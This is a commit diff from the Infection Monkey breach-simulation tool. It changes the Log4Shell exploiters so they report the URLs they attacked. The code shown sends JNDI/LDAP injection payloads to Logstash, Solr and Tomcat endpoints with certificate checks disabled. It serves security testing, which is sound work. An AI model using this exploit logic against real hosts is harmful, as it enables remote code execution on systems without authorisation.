Agent: add vulnerable log4shell url's

Url's are used in mitre report
2022-01-21 15:32:08 +02:00 · 2022-01-21 15:32:08 +02:00 · 189505a97d
parent 75ed119c00
commit 189505a97d
5 changed files with 12 additions and 4 deletions
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@ -143,7 +143,7 @@ class Log4ShellExploiter(WebRCE):
        for exploit in get_log4shell_service_exploiters():
            for port in self._open_ports:
                try:
-                    exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
+                    url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
                except Exception as ex:
                    logger.warning(
                        "An error occurred while attempting to exploit log4shell on a "
@ -155,6 +155,7 @@ class Log4ShellExploiter(WebRCE):
                        "service_name": exploit.service_name,
                        "port": port,
                    }
+                    self.exploit_info["vulnerable_urls"].append(url)
                    return True

        return False
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/i_service_exploiter.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/i_service_exploiter.py
@ -12,5 +12,6 @@ class IServiceExploiter(metaclass=abc.ABCMeta):

    @staticmethod
    @abc.abstractmethod
-    def trigger_exploit(payload: str, host: VictimHost, port: int):
+    def trigger_exploit(payload: str, host: VictimHost, port: int) -> str:
+        # Return the URL the exploit was attempted on
        raise NotImplementedError
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py
@ -15,6 +15,8 @@ class LogStashExploit(IServiceExploiter):
    def trigger_exploit(payload: str, host: VictimHost, port: int):
        url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
        try:
-            resp = requests.get(url, timeout=5, verify=False)  # noqa DUO123
+            requests.get(url, timeout=5, verify=False)  # noqa DUO123
        except requests.ReadTimeout as e:
            logger.debug(f"Log4shell request failed {e}")
+
+        return url
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
@ -18,3 +18,5 @@ class SolrExploit(IServiceExploiter):
            requests.post(url, timeout=5, verify=False)  # noqa DUO123
        except requests.ReadTimeout as e:
            logger.debug(f"Log4shell request failed {e}")
+
+        return url
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py
@ -16,6 +16,8 @@ class TomcatExploit(IServiceExploiter):
        url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
        payload = {"dataname": "foo", "datavalue": payload}
        try:
-            resp = requests.post(url, data=payload, timeout=5, verify=False)  # noqa DUO123
+            requests.post(url, data=payload, timeout=5, verify=False)  # noqa DUO123
        except requests.ReadTimeout as e:
            logger.debug(f"Log4shell request failed {e}")
+
+        return url